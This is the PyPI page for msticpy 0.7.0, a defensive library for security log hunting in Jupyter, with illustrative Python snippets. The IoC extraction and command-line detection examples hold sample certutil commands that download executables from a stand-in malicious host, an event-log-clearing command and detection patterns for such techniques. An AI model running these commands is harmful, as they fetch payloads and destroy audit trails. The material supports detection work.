MSTIC Security Tools

MSTIC Jupyter and Python Security Tools

Microsoft Threat Intelligence Python Security Tools.

msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. It includes functionality to:

  • query log data from multiple sources
  • enrich the data with Threat Intelligence, geolocations and Azure resource data
  • extract Indicators of Activity (IoA) from logs and unpack encoded data
  • perform sophisticated analysis such as anomalous session detection and time series decomposition
  • visualize data using interactive timelines, process trees and multi-dimensional Morph Charts

It also includes some time-saving notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment.

Timeline

The msticpy package was initially developed to support Jupyter Notebook authoring for Azure Sentinel. While Azure Sentinel is still a big focus of our work, we are extending the data query/acquisition components to pull log data from other sources (currently Microsoft Defender and Microsoft Graph; we are actively working on support for data from other SIEM platforms). Most of the components can also be used with data from any source. Pandas DataFrames are the common input and output format for almost all components.

The package addresses three central needs for security investigators and hunters:

  • Acquiring and enriching data
  • Analyzing data
  • Visualizing data

We welcome feedback, bug reports, suggestions for new features and contributions.

Installing

pip install msticpy

or for the latest dev build

pip install git+https://github.com/microsoft/msticpy

Documentation

Full documentation is at ReadTheDocs

Sample notebooks for many of the modules are in the docs/notebooks folder.

You can also browse through the sample notebooks referenced at the end of this document to see some of the functionality used in context. You can play with some of the package functions in this interactive demo on mybinder.org.

Binder


Log Data Acquisition

  • QueryProvider - extensible query library targeting Azure Sentinel, OData sources and other sources. Built-in parameterized queries allow complex queries to be run from a single function call. Add your own queries using a simple YAML schema.
  • security_alert and security_event - encapsulation classes for alerts and events.
  • entity_schema - definitions for multiple entities (Host, Account, File, IPAddress, etc.)
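
The idea of a parameterized query can be sketched in plain Python. This is only an illustration of the concept, not the QueryProvider API: the `QUERY_DEF` dictionary, its field names and the `build_query` helper are all hypothetical, and the query text is an assumed example.

```python
from datetime import datetime, timedelta, timezone

# Hypothetical query definition: a template plus default parameter values.
# The field names here are illustrative, not the package's YAML schema.
QUERY_DEF = {
    "template": (
        "SecurityEvent"
        " | where TimeGenerated >= datetime({start})"
        " | where TimeGenerated <= datetime({end})"
        " | where Computer == '{host_name}'"
        " | take {limit}"
    ),
    "defaults": {"limit": 100},
}


def build_query(query_def, **params):
    """Merge caller parameters over the defaults and fill in the template."""
    merged = {**query_def["defaults"], **params}
    rendered = {
        key: value.isoformat() if isinstance(value, datetime) else value
        for key, value in merged.items()
    }
    # str.format raises KeyError if a required parameter is missing.
    return query_def["template"].format(**rendered)


end = datetime(2020, 9, 1, tzinfo=timezone.utc)
query_text = build_query(
    QUERY_DEF, start=end - timedelta(days=1), end=end, host_name="web01"
)
print(query_text)
```

Keeping defaults next to the template means a caller supplies only the values that vary, which is what lets a complex query run from a single function call.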

Data Queries Notebook

Data Enrichment

tiproviders

The TILookup class can look up IoCs across multiple TI providers. Built-in providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.

The input can be a single IoC observable or a pandas DataFrame containing multiple observables. Depending on the provider, you may require an account and an API key. Some providers also enforce throttling (especially for free tiers), which might affect performing bulk lookups.
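
To show why throttling matters for bulk lookups, here is a minimal pacing sketch. It does not use TILookup: `throttled_lookup`, `fake_lookup` and the rate of 4 requests per minute are assumptions chosen for illustration, and the sleep function is injected so the example runs instantly.

```python
import time


def throttled_lookup(observables, lookup_fn, max_per_minute=4, sleep=time.sleep):
    """Call lookup_fn once per unique observable, pausing between calls."""
    interval = 60.0 / max_per_minute
    results = {}
    # dict.fromkeys removes duplicates while keeping the original order.
    unique = list(dict.fromkeys(observables))
    for index, observable in enumerate(unique):
        if index:  # no pause needed before the first request
            sleep(interval)
        results[observable] = lookup_fn(observable)
    return results


def fake_lookup(observable):
    """Stand-in for a real provider call (hypothetical response shape)."""
    return {"ioc": observable, "severity": "unknown"}


pauses = []  # record the pauses instead of really sleeping
results = throttled_lookup(
    ["203.0.113.7", "malicious.example", "203.0.113.7"],
    fake_lookup,
    max_per_minute=4,
    sleep=pauses.append,
)
print(len(results), pauses)
```

De-duplicating before the loop is the cheapest saving: with a free-tier limit, every repeated observable would otherwise cost a full pause.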

TIProviders and TILookup Usage Notebook

GeoLocation Data

The GeoIP lookup classes allow you to match the geo-locations of IP addresses using either:

  • GeoLiteLookup - MaxMind GeoLite
  • IPStackLookup - IPStack

Folium map

GeoIP Lookup and GeoIP Notebook

Azure Data

This package contains functionality for enriching Azure host data with additional host details exposed via the Azure API.

Azure Data

Security Analysis

This subpackage contains several modules helpful for working on security investigations and hunting:

Anomalous Sequence Detection

Detect unusual sequences of events in your Office, Active Directory or other log data. You can extract sessions (e.g. activity initiated by the same account) and identify and visualize unusual sequences of activity. For example, detecting an attacker setting a mail forwarding rule on someone's mailbox.
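
One way to picture sequence scoring is a first-order transition model: count how often one action follows another, then rate each session by how likely its transitions are. The sketch below is a deliberately simplified stand-in written with the standard library; the function names and sample sessions are hypothetical, and the package's own modelling may differ.

```python
import math
from collections import Counter, defaultdict


def train_transitions(sessions):
    """Count action-to-action transitions across all sessions."""
    counts = defaultdict(Counter)
    for session in sessions:
        steps = ["<start>", *session, "<end>"]
        for current, following in zip(steps, steps[1:]):
            counts[current][following] += 1
    return counts


def session_score(session, counts, vocab_size):
    """Mean log-probability per transition; lower means more unusual."""
    steps = ["<start>", *session, "<end>"]
    total = 0.0
    for current, following in zip(steps, steps[1:]):
        seen = counts.get(current, Counter())
        # Add-one smoothing gives unseen transitions a small non-zero probability.
        prob = (seen[following] + 1) / (sum(seen.values()) + vocab_size)
        total += math.log(prob)
    return total / (len(steps) - 1)


# Hypothetical sessions: each is the ordered list of actions for one account.
sessions = [
    ["Login", "ReadMail", "Logout"],
    ["Login", "ReadMail", "SendMail", "Logout"],
    ["Login", "ReadMail", "Logout"],
    ["Login", "Set-Mailbox", "New-InboxRule", "Logout"],
]
counts = train_transitions(sessions)
vocab_size = len({step for s in sessions for step in s}) + 1  # +1 for <end>
most_unusual = min(sessions, key=lambda s: session_score(s, counts, vocab_size))
print(most_unusual)
```

Averaging per transition keeps long sessions from being penalized simply for their length.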

Anomalous Sessions and Anomalous Sequence Notebook

Time Series

Time series analysis allows you to identify unusual patterns in your log data, taking into account normal seasonal variations (e.g. the regular ebb and flow of events over hours of the day, days of the week, etc.). Combining analysis with visualization highlights unusual traffic flows or event activity in any data set.
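
The effect of accounting for seasonality can be shown with a small standard-library sketch. It compares each hourly count with the median for the same hour of day, so a busy working day is not flagged but an odd spike at 02:00 is. This is an assumed, simplified technique for illustration (per-slot median baseline with a median-absolute-deviation threshold), not necessarily the decomposition the package uses; the data is synthetic.

```python
from collections import defaultdict
from statistics import median


def seasonal_anomalies(counts, period=24, threshold=3.0):
    """Return indexes whose value deviates strongly from its seasonal slot."""
    slots = defaultdict(list)
    for index, value in enumerate(counts):
        slots[index % period].append(value)
    baseline = {slot: median(values) for slot, values in slots.items()}
    residuals = [
        value - baseline[index % period] for index, value in enumerate(counts)
    ]
    # Median absolute deviation as a robust spread estimate.
    # Fall back to 1.0 when the residuals are all (or mostly) zero.
    mad = median(abs(r) for r in residuals) or 1.0
    return [i for i, r in enumerate(residuals) if abs(r) / mad > threshold]


# Synthetic hourly counts: quiet nights, busy working hours, four days.
day_pattern = [5] * 8 + [50] * 10 + [5] * 6
hourly_counts = day_pattern * 4
hourly_counts[3 * 24 + 2] = 60  # unexpected burst at 02:00 on day four

anomalies = seasonal_anomalies(hourly_counts)
print(anomalies)
```

A count of 60 is close to normal daytime volume, so a global threshold would miss it; only the comparison against the usual 02:00 level makes it stand out.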

Time Series anomalies

Time Series

base64unpack

Base64 and archive (gz, zip, tar) extractor. It tries to identify any base64-encoded strings and decode them. If the result looks like one of the supported archive types, it unpacks the contents. The results of each decode/unpack are rechecked for further base64 content, up to a specified depth.
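
The decode, unpack and recheck loop described above can be sketched with the standard library. This is a minimal illustration that assumes only gzip as the archive type; the `unpack` function, the 20-character minimum and the sample command are hypothetical and are not the module's API.

```python
import base64
import binascii
import gzip
import re
import zlib

# Runs of 20 or more base64 characters, with optional padding.
B64_PATTERN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def unpack(text, max_depth=3, depth=1):
    """Return (depth, decoded_text) for each base64 run, searched recursively."""
    results = []
    if depth > max_depth:
        return results
    for match in B64_PATTERN.finditer(text):
        try:
            raw = base64.b64decode(match.group(), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all
        if raw[:2] == b"\x1f\x8b":  # gzip magic number
            try:
                raw = gzip.decompress(raw)
            except (OSError, EOFError, zlib.error):
                continue
        try:
            decoded = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue  # binary content is skipped in this sketch
        results.append((depth, decoded))
        # Recheck the decoded text for further encoded content.
        results.extend(unpack(decoded, max_depth, depth + 1))
    return results


# Build a two-layer sample: base64 text inside a gzipped, base64-encoded wrapper.
inner = "Invoke-Expression 'whoami /all'"
layer1 = base64.b64encode(inner.encode()).decode()
layer2 = base64.b64encode(gzip.compress(f"run {layer1}".encode())).decode()
decoded_layers = unpack(f"cmd /c echo {layer2}")
print(decoded_layers)
```

The depth limit is what stops a maliciously nested payload from causing unbounded recursion.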

Base64 Decoding Base64Unpack Notebook

iocextract

Uses regular expressions to look for Indicator of Compromise (IoC) patterns - IP addresses, URLs, DNS domains, hashes, file paths. Input can be a single string or a pandas DataFrame.
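
A regex-driven extractor of this kind can be sketched as a dictionary of named patterns applied to the input string. The patterns below are simplified assumptions written for this example (they cover only IPv4, URLs and two hash lengths) and are not the module's own expressions; `extract_iocs` is a hypothetical helper.

```python
import re

# Simplified, illustrative patterns; real-world expressions are more thorough.
OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IOC_PATTERNS = {
    "ipv4": re.compile(rf"\b(?:{OCTET}\.){{3}}{OCTET}\b"),
    "url": re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE),
    "sha256_hash": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "md5_hash": re.compile(r"\b[a-fA-F0-9]{32}\b"),
}


def extract_iocs(text):
    """Return {ioc_type: sorted unique matches} for every pattern that hits."""
    found = {}
    for ioc_type, pattern in IOC_PATTERNS.items():
        matches = sorted(set(pattern.findall(text)))
        if matches:
            found[ioc_type] = matches
    return found


sample = (
    "certutil -urlcache -f http://malicious.example/payload.exe p.exe; "
    "ping 203.0.113.7; file hash d41d8cd98f00b204e9800998ecf8427e"
)
iocs = extract_iocs(sample)
print(iocs)
```

Applying the same function to each row of a text column is how a single-string extractor extends to tabular input.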

IoC Extraction IoCExtract Notebook

eventcluster (experimental)

This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.

Clustering

This is an unsupervised learning module implemented using scikit-learn DBSCAN.

Event Clustering Event Clustering Notebook

Visualization

Timelines

Display any log events on an interactive timeline. Built on the Bokeh visualization library, the timeline control lets you visualize one or more event streams, interactively zoom into specific time slots and view event details for plotted events.

Timeline

Timeline Timeline Notebook

Process Trees

The process tree functionality has two main components:

  • Process Tree creation - taking a process creation log from a host and building the parent-child relationships between processes in the data set.
  • Process Tree visualization - takes the processed output and displays an interactive process tree using Bokeh plots.

There is also a set of utility functions to extract individual and partial trees from the processed data set.
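
The tree-creation step can be illustrated with a small sketch that links each process record to its parent by process ID. The record fields (`pid`, `ppid`, `name`) and both helper functions are assumptions made for this example. A real implementation also has to cope with PID reuse, typically by taking timestamps into account, which this sketch ignores.

```python
from collections import defaultdict


def build_tree(records):
    """Group records under their parent; parents not in the log become roots."""
    known_pids = {rec["pid"] for rec in records}
    children = defaultdict(list)
    roots = []
    for rec in records:
        if rec["ppid"] in known_pids:
            children[rec["ppid"]].append(rec)
        else:
            roots.append(rec)
    return roots, children


def render(nodes, children, depth=0):
    """Return the tree as indented text lines, depth-first."""
    lines = []
    for rec in nodes:
        lines.append("  " * depth + f"{rec['name']} ({rec['pid']})")
        lines.extend(render(children.get(rec["pid"], []), children, depth + 1))
    return lines


# Hypothetical process creation records from one host.
process_log = [
    {"pid": 1200, "ppid": 900, "name": "explorer.exe"},
    {"pid": 2100, "ppid": 1200, "name": "cmd.exe"},
    {"pid": 2200, "ppid": 2100, "name": "powershell.exe"},
    {"pid": 2300, "ppid": 1200, "name": "notepad.exe"},
]
roots, children = build_tree(process_log)
tree_lines = render(roots, children)
print("\n".join(tree_lines))
```

Extracting a partial tree then amounts to calling `render` with a single record as the starting node instead of the full list of roots.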

Process Tree

Process Tree Process Tree Notebook

Other Tools

auditdextract

Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it will re-assemble the process command line arguments into a single string).
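
The collapsing and decoding steps can be sketched as follows. This is an illustrative parser written for this example, not the module's code: the regular expressions, the `parse_audit` function and the sample records are assumptions, and only EXECVE arguments are hex-decoded here.

```python
import re
from collections import defaultdict

HEADER = re.compile(
    r"type=(?P<type>\S+) msg=audit\((?P<time>[\d.]+):(?P<id>\d+)\): (?P<body>.*)"
)
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def decode_arg(value):
    """Quoted arguments are literal; unquoted ones are treated as hex-encoded."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8")
    except ValueError:  # not hex, or not valid UTF-8
        return value


def parse_audit(lines):
    """Collapse records that share a message ID into one event per ID."""
    events = defaultdict(dict)
    for line in lines:
        header = HEADER.match(line)
        if not header:
            continue
        fields = dict(FIELD.findall(header["body"]))
        if header["type"] == "EXECVE":
            # Re-assemble the argument list into a single command line.
            argc = int(fields.get("argc", 0))
            args = [decode_arg(fields.get(f"a{i}", "")) for i in range(argc)]
            fields = {"cmdline": " ".join(args)}
        else:
            fields = {key: value.strip('"') for key, value in fields.items()}
        events[header["id"]][header["type"]] = fields
    return dict(events)


# Hypothetical audit records for a single process start (message ID 412).
audit_lines = [
    'type=SYSCALL msg=audit(1599000000.123:412): syscall=59 success=yes pid=2345 exe="/usr/bin/cat"',
    'type=EXECVE msg=audit(1599000000.123:412): argc=2 a0="cat" a1=2F746D702F6D792066696C65',
    'type=CWD msg=audit(1599000000.123:412): cwd="/home/alice"',
]
events = parse_audit(audit_lines)
print(events["412"]["EXECVE"]["cmdline"])
```

Restricting hex decoding to argument fields avoids misreading ordinary numeric values such as a PID as encoded text.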

This is still a work-in-progress.

syslog_utils

Module to support an investigation of a Linux host with only syslog logging enabled. This includes functions for collating host data, clustering logon events and detecting user sessions containing suspicious activity.

cmd_line

A module to support the detection of known malicious command line activity or suspicious patterns of command line activity.
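
Pattern-based command line detection can be pictured as a set of named regular expressions checked against each command. The rule names and patterns below are hypothetical examples chosen for this sketch; they are not the module's rule set.

```python
import re

# Hypothetical rules: each name maps to a pattern for one suspicious technique.
SUSPICIOUS_PATTERNS = {
    "encoded_powershell": re.compile(
        r"powershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s", re.IGNORECASE
    ),
    "download_via_certutil": re.compile(
        r"certutil(\.exe)?\b.*-urlcache", re.IGNORECASE
    ),
    "clear_event_log": re.compile(r"wevtutil(\.exe)?\s+cl\b", re.IGNORECASE),
}


def match_command(cmdline):
    """Return the names of all rules that match the command line."""
    return [
        name
        for name, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(cmdline)
    ]


commands = [
    "powershell.exe -NoP -enc SQBFAFgA",
    "certutil -urlcache -split -f http://malicious.example/a.exe",
    "wevtutil cl Security",
    "notepad.exe report.txt",
]
hits = {cmd: match_command(cmd) for cmd in commands}
print(hits)
```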

Notebook widgets

These are built from the Jupyter ipywidgets collection and group common functionality useful in InfoSec tasks such as list pickers, query time boundary settings and event display into an easy-to-use format.

Time span Widget

Alert browser


Clone the notebooks in this repo to Azure Notebooks

Requires sign-in to Azure Notebooks

More Notebooks

View directly on GitHub or copy and paste the link into nbviewer.org

Notebook examples with saved data

See the following notebooks for more examples of the use of this package in practice:

Supported Platforms and Packages


Contributing

For (brief) developer guidelines, see the Contributor Guidelines wiki article.

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com.

When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

This version

0.7.0

Download files

Source Distribution

msticpy-0.7.0.tar.gz (239.3 kB view details)

Uploaded Source

Built Distribution

msticpy-0.7.0-py3-none-any.whl (301.8 kB view details)

Uploaded Python 3

File details

Details for the file msticpy-0.7.0.tar.gz.

File metadata

  • Download URL: msticpy-0.7.0.tar.gz
  • Upload date:
  • Size: 239.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/47.1.0 requests-toolbelt/0.9.1 tqdm/4.48.2 CPython/3.7.8

File hashes

Hashes for msticpy-0.7.0.tar.gz
Algorithm Hash digest
SHA256 a32837e13eab9924ab02c339f1d28965da8ba7aae7886112a2b0dca09e53f4da
MD5 04187e52207c57c18cd1e8853ec8a2e9
BLAKE2b-256 3479b22001ef3c3755c63b6dc0ace841bc5bb2566d8d7315054602bb4fcce2d8

File details

Details for the file msticpy-0.7.0-py3-none-any.whl.

File metadata

  • Download URL: msticpy-0.7.0-py3-none-any.whl
  • Upload date:
  • Size: 301.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.5.0.1 requests/2.24.0 setuptools/47.1.0 requests-toolbelt/0.9.1 tqdm/4.48.2 CPython/3.7.8

File hashes

Hashes for msticpy-0.7.0-py3-none-any.whl
Algorithm Hash digest
SHA256 1688df61c5df04a2e5c28ff5f035b9aa9a13efe9dd20b38054c46ed1a7fa8584
MD5 9665d1c1a2ee020293813acd6eaa9fbc
BLAKE2b-256 e7d48f8d42e69960ede7f1bf711c70ca871bbb00458a3ac90d1b5819462f29ff
